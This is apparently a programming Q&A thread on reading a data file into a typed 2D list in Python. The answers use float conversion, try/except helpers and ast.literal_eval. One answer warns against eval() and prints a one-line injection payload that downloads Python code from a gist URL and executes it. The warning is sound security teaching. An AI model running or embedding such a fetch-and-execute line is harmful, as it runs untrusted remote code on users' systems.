How do I parse a file into a 2d array while supporting data types in Python?
I am new to programming. I want to read a data file and store it as a 2D array in Python 3 so that I can work with individual items. I am using the following code to read in the file:
with open("text.txt", "r") as text:
    lines = [line.split() for line in text]
However, this parses everything as text. How can I read in a file while preserving data types (text as str, integers as int, floats as float, etc.)? The input file looks like this:
HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
RBAY 4739765.776 2970758.460 -3054077.535
TDOU 5064840.815 2969624.535 -2485109.939
ULDI 4796680.897 2930311.589 -3005435.714
Usually, you know in advance which type of data to expect in particular rows, columns, or cells. In your case, the first cell of every row is a string and all the following cells are numbers.
data = []
with open('text.txt', 'r') as fp:
    for line in (l.split() for l in fp):
        line[1:] = [float(x) for x in line[1:]]
        data.append(line)
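If the columns ever need different types, the same idea can be generalized with one converter per column. This is only a sketch: `COLUMN_TYPES` and `parse_row` are names made up for illustration, and the sample lines are copied from the question instead of being read from a file.

```python
# One converter per column: station name as str, coordinates as float.
# COLUMN_TYPES and parse_row are hypothetical names, not part of any library.
COLUMN_TYPES = (str, float, float, float)

def parse_row(line, types=COLUMN_TYPES):
    """Split a line on whitespace and convert each cell with its column's type."""
    cells = line.split()
    if len(cells) != len(types):
        raise ValueError("expected %d cells, got %d" % (len(types), len(cells)))
    return [convert(cell) for convert, cell in zip(types, cells)]

# Sample lines taken from the question.
sample = [
    "HNUS 4973168.840 1734085.512 -3585434.051",
    "PRET 5064032.237 2724721.031 -2752950.762",
]
data = [parse_row(line) for line in sample]
print(data[0])
```

Failing loudly on a row with the wrong number of cells is a design choice here; silently padding or truncating would hide a malformed input file.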
If you really want to convert every cell to the closest applicable data type, you can use a function like this and apply it to every cell in a 2D list.
def nearest_applicable_conversion(x):
    try:
        return int(x)
    except ValueError:
        pass
    try:
        return float(x)
    except ValueError:
        pass
    return x
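Applying it to every cell could look like the sketch below. The function is repeated so the snippet runs on its own, and the sample rows are made up (the second cell of the first row is changed to an integer) just to show all three outcomes.

```python
def nearest_applicable_conversion(x):
    """Try int first, then float, and fall back to the original string."""
    try:
        return int(x)
    except ValueError:
        pass
    try:
        return float(x)
    except ValueError:
        pass
    return x

# Made-up sample rows, already split into cells of text.
rows = [
    "HNUS 42 1734085.512 -3585434.051".split(),
    "PRET 5064032.237 2724721.031 -2752950.762".split(),
]

# Nested list comprehension: outer loop over rows, inner loop over cells.
table = [[nearest_applicable_conversion(cell) for cell in row] for row in rows]
print(table[0])
```

Keep in mind that float() also accepts strings such as "nan" and "inf", so a text cell with exactly that content would come back as a float.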
I strongly discourage using eval(), as it will evaluate any valid Python code and makes your system vulnerable to attacks by anyone who knows how. I could easily execute arbitrary code by putting the following into one of the cells of text.txt that you pass to eval(). I just have to make sure it doesn't contain spaces, since those would split the code across multiple cells:
(lambda:(eval(compile(__import__('urllib.request').request.urlopen('https://gist.githubusercontent.com/NiklasRosenstein/470377b7ceef98ef6b87/raw/06593a30d5b00ca506b536315ac79f7b950a5163/jagged.py').read().decode(),'<string>','exec'),globals())))()
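For comparison, ast.literal_eval() from the standard library only accepts Python literals (numbers, strings, tuples, lists, dicts, sets, booleans, None) and refuses anything that has to be executed. A small sketch, using a harmless stand-in for the payload above:

```python
import ast

# A harmless stand-in for a malicious cell: a function call, not a literal.
cell = "__import__('os').getcwd()"

try:
    ast.literal_eval(cell)
except ValueError as exc:
    # literal_eval refuses to evaluate calls, attribute access, names, etc.
    rejected = True
    print("rejected:", exc)
else:
    rejected = False

# A plain numeric literal is still parsed as expected.
value = ast.literal_eval("4973168.840")
print(value, type(value))
```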
Is this what you want?
import ast
with open("1.txt", "r") as inp:
    c = [a if a.isalpha() else ast.literal_eval(a.strip()) for line in inp for a in line.split()]
Output:
print(c)
['HNUS', 4973168.84, 1734085.512, -3585434.051, 'PRET', 5064032.237, 2724721.031, -2752950.762, 'RBAY', 4739765.776, 2970758.46, -3054077.535, 'TDOU', 5064840.815, 2969624.535, -2485109.939, 'ULDI', 4796680.897, 2930311.589, -3005435.714]
print(c[1], type(c[1]))
4973168.84 <class 'float'>
Note that you cannot apply ast.literal_eval() directly to bare words. It parses its argument as a Python literal, so a string value must still carry its own quotes inside the string you pass in:
>>> ast.literal_eval("as")
  File "<unknown>", line 1
    as
     ^
SyntaxError: unexpected EOF while parsing
>>> ast.literal_eval('"as"')
'as'
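The isalpha() check used above only covers purely alphabetic cells; a mixed token such as AB12 would still be handed to literal_eval() and fail. One possible alternative is to fall back to the original text whenever parsing fails. `parse_cell` is a hypothetical helper name used only for this sketch:

```python
import ast

def parse_cell(token):
    """Return the Python literal for token, or token itself if it is not a literal."""
    try:
        return ast.literal_eval(token)
    except (ValueError, SyntaxError):
        # Bare words raise ValueError or SyntaxError: keep them as text.
        return token

# Sample line taken from the question.
row = "HNUS 4973168.840 1734085.512 -3585434.051".split()
parsed = [parse_cell(cell) for cell in row]
print(parsed)
```

One caveat of this approach: cells whose text happens to be a valid literal, such as None or True, are converted to those constants instead of staying strings.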
Edit:
To get it as a 2-dimensional array:
import ast
with open("1.txt", "r") as inp:
    c = [[a if a.isalpha() else ast.literal_eval(a.strip()) for a in line.split()] for line in inp]
Output:
print(c)
[['HNUS', 4973168.84, 1734085.512, -3585434.051], ['PRET', 5064032.237, 2724721.031, -2752950.762], ['RBAY', 4739765.776, 2970758.46, -3054077.535], ['TDOU', 5064840.815, 2969624.535, -2485109.939], ['ULDI', 4796680.897, 2930311.589, -3005435.714]]